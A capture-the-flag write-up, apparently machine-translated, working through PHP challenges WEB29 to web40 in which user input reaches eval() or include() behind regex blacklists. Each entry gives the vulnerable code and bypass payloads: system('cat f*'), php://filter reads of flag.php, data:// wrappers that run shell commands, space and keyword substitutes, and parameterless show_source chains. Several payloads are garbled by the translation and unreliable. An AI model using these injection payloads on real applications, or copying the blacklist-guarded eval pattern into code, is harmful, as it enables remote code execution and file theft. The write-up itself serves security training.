Take a look before making a title
command tips
command to bypass summary
WEB29
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Method 1:
Fuzzy search
payload:?c=system('cat f*');
Solution 2: After
understanding the eval function
Incoming
?? C = echo "npfs" ;> ctf <php system ( 'ls');
can see flag.php file, after the include for reading comprising
payload:
?c=echo “npfs”; ?>ctf <?php include($_GET[‘url’]);&url=php://filter/read=convert.base64-encode/resource=flag.php
WEB30
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Solution one:
pyaload: ?c=echo
cat f*;
pyaload: ?c=echonl f*;
Also similar to cat:
more,less,nl,tail
Solution two:
payload:
?c=echo "npfs "; include($_GET[‘url’]); ?>&url=php://filter/read=convert.base64-encode/resource=flag.php
WEB31
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
This question filters flag, sytem, php, cat, sort shell, ., space, '
When cat is filtered, you can use the following command instead
(1)more: display file content page by page
(2)less: similar to more, but better than more, he can turn pages [pg dn][pg up]
(3)head: view the first few pages Line
(4) tac: Display from the last line, it can be seen that tac is the reverse display of cat
(5) tail: Check the last few lines
(6) nl: When displayed, by the way, output line number
(7) od: Binary way to read the contents of the file
(8) vi: an editor, this can also be viewed
(9) vim: an editor, this can also be viewed
(10) sort: you can view
(11) uniq: you can view
( 12) file -f: report the error and give the specific content
(13) sed: an editor, this can also be viewed
When the spaces are filtered, you can use the following commands to replace
%09(tab), $IFS$9, IFS, {IFS},IFS、IFS%09(tab)、< 、<>、%20(space)
payload:
? c = echo
nl%09f*;
web32
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Filter the brackets on the basis of the previous
Use include "$_POST[1]"? plus post to pass parameters and use pseudo-protocol to bypass
paylaod
? C = the include "the POST $ _ [. 1]">?
. 1 = PHP: //filter/read=convert.base64-encode/resource=flag.php
. 1
2
course using the GET parameter passing the same effect can be obtained
payload
?c=include$_GET["a"]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
1
Get a string of base64 encoding after passing, and get flag after decoding
flag:flag{cc9b544f-8f19-48b6-b867-b9837304f780}
WEB33
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
This question adds the filtering of spaces and double quotation marks on the basis of the previous one.
pyaload:
?c=include%09$GET[]?>&_=php://filter/read=convert.base64-encode/resource=flag.php
WEB34
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
More filtering: the
same as the previous payload.
WEB35
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
The equal sign
payload is filtered more :
?c=include%09$GET[]?>&_=php://filter/read=convert.base64-encode/resource=flag.php
WEB36
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Here are more 0 to 9
payloads filtered :
?c=include%09$GET[]?>&_=php://filter/read=convert.base64-encode/resource=flag.php
WEB37
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
The include, direct pseudo protocol has been given here. (Note to use double quotes, because the title uses single quotes)
payload:
data:text/plain,<?php system("cat f*")?>
WEB38
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
Added php filtering
payload:
?c=data://text,plain,baser64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs/Pg==
web39
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
Here is one more .php
and then we directly use the pseudo protocol
payload:data:text/plain,<?php system('cat f*')?>
data://text/plain, this is equivalent to executing the php statement. php Because the previous php statement has been closed, the following .php will be treated as an html page and displayed directly on the page, which has no effect
web40
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Basically, numbers and necessary symbols are filtered.
Here you can construct a parameterless function for file reading.
File reading without parameters.
payload:
?c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=session_start();system(session_id());
passid=ls